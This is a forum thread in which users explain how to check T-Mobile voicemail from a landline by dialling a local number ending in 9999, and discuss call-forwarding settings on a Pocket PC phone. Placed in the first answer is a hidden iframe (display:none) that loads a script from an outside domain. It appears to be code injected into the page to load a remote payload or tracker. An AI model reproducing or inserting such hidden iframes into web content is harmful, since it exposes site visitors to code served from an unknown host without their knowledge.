+ Reply to Thread

Is there toll-free 800 number for picking up T-Mobile voice

There is not an 800 number that you can use to retrieve your messages from a land line, but there is a local number. You dial the following number and will receive a prompt for your number and password.

You dial: xxx-yyy-9999
    where xxx=your cell phone's area code
    where yyy=your cell phone's prefix<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

What is this used for?

Mike,

What is this used for. I usually just hit SpeedDial #1 and it checks my messages. This seems to work both away and at home, so what is the reason you would use the 9999 option?
    NewsGuy
    pdaPhoneHome

REGISTER and join in the Discussions!!!

If you are in your local calling area (e.g. at home), you can call a local number (from your home phone) without using MINUTES on your cell phone. Understand now, or am I still not being clear? Hope this helps.

Editor and Site Administrator Convergent's Avatar

I'm being dense

Mike,

I'm not getting it...

So this is to use a land-line to call and get messages for your T-Mobile phone? If so, then I don't get the 9999. How can everyone dial the same number... 9999 .... and get their messages?

Note - I have the 5000 minute plan, so I always use my cellphone..
    Mike - Been Converged?

Mike,

Yes, this is for picking up voice mail from a land-line, for those that have far fewer minutes than you do.

When you dial the number, it then asks for your cell phone number, and password code.

Clear now?

Editor and Site Administrator Convergent's Avatar

Cool

Got it... I'll edit your original FAQ post...
    Mike - Been Converged?

Addition

It depends where you are as to if it's free or not but one way to pick up VM from another phone is to switch off your phone, dial your own number, hit * while your message is playing and then you will be asked to type in your passcode.
    For some people it's easier to remember their own number rather than the 9999 trick. Also, I'm not sure that 9999 will work absolutely everywhere.

The 9999 number tells the phone software where to go?....

In the T-Mobile Pocket PC Phone Edition Phone Program,
    on the "Tools" menu,
    Options...,
    "Services" Tab,
    "Call Forwarding" and click the "Get Settings" button,
    I see "+1 (xxx) yyy-9999 listed under all 3 of the following:
    Unavailable, Busy, & No Answer with check marks to turn them all on or off.

I assumed this means I could forward my voicemail for these conditions to where ever I wanted. Like the home phone answering machine or even the work voicemail box. That way I would only have to check messages in one location. You would need to know this '9999' number information if you ever moved or wanted to change back to default settings. It's nice that the software and system designers gave us choices. Too bad the T-Mobile customer service people don't always know how the system and phones work.

Anybody ever tried changing the Unavailable, Busy, & No Answer. Currently I do the reverse. If no answers at home or in my office, it forwards to my mobile number. I hate having to check voicemail in more than one location.

Just a thought, :o
    -John D.